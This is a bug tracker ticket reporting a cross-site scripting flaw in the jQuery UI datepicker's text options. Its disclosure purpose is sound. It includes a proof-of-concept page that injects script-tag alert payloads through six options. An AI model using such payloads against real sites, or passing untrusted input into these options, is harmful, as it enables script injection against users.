Opened 9 months ago

#15284 new bug

XSS Vulnerability on text options of jQuery UI datepicker

Reported by: andycyork Owned by:
Priority: minor Milestone: none
Component: ui.datepicker Version: 1.12.1
Keywords: Cc:
Blocked by: Blocking:

Description

similar to https://github.com/jquery/api.jqueryui.com/issues/281 but applies to the datepicker

to recreate

Create a new HTML page.

Inject this content into new page:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>XSS in  options of datepicker</title>

  <script src="https://code.jquery.com/jquery-3.3.1.js"></script>
  <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
  <link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
  <script>
		$(document).ready(function () {
			$( "#datepicker" ).datepicker({
				showButtonPanel: true,
				showOn: "both",
				closeText: '<script>alert("closeText XSS")<\/script>', 
				currentText: '<script>alert("currentText XSS")<\/script>',
				prevText: '<script>alert("prevText XSS")<\/script>',	
				nextText: '<script>alert("nextText XSS")<\/script>',
				buttonText: '<script>alert("buttonText XSS")<\/script>',
				appendText: '<script>alert("appendText XSS")<\/script>'
			});
    });
    </script>
</head>
<body>
	<p>Date: <input type="text" id="datepicker"></p>
</body>
</html>


on load, alerts are shown for appendText & buttonText
after clicking the input control, alerts are shown for closeText, currentText, prevText & nextText

The scripted alerts should not be shown - an attacker can take advantage of injecting malicious XSS content into website.

Change History (0)

Note: See TracTickets for help on using tickets.